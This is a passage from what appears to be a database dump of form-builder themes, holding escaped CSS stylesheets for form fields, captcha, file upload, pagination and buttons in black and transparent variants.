{\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #6C005E;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #6C005E;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #6C005E;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(3,'Theme 01 black','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',1),(4,'Theme 01 transparent (black button)','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	